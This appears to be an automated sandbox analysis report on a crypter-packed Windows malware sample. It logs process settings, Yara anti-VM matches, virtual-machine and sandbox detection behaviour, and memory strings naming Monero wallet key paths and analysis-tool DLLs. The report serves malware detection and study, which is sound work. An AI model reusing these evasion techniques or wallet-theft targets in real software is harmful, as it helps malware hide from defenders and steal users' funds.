Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 31.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.JxvL46JFox50ORU3tEsaxZ2Y.exe.3d45570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.LeVSNPB9FLpXmtLG7mcICpEf.exe.3265570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.LeVSNPB9FLpXmtLG7mcICpEf.exe.3265570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2354690717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1888965030.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2588945166.000000000043A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe PID: 7436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LeVSNPB9FLpXmtLG7mcICpEf.exe PID: 7948, type: MEMORYSTR

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Found API chain indicative of sandbox detection

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Sandbox detection routine: GetCursorPos, DecisionNode, Sleep

graph_2-48954

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Evasive API call chain: GetPEB, DecisionNodes, Sleep

graph_2-48957

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	API/Special instruction interceptor: Address: 7FF90818E814
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	API/Special instruction interceptor: Address: 7FF90818D584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: pZhQ7nTCR9R3A5r5QIQYLapT.exe, 0000000C.00000002.2515046718.00000000026AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKJ
Source: LeVSNPB9FLpXmtLG7mcICpEf.exe, 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL18:44:1718:44:1718:44:1718:44:1718:44:1718:44:17DELAYS.TMP%S%SNTDLL.DLL
Source: JxvL46JFox50ORU3tEsaxZ2Y.exe, 00000006.00000002.1888965030.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL18:44:2018:44:2018:44:2018:44:2018:44:2018:44:20DELAYS.TMP%S%SNTDLL.DLL

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Memory allocated: 26F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Memory allocated: 27A0000 memory reserve \| memory write watch	Jump to behavior
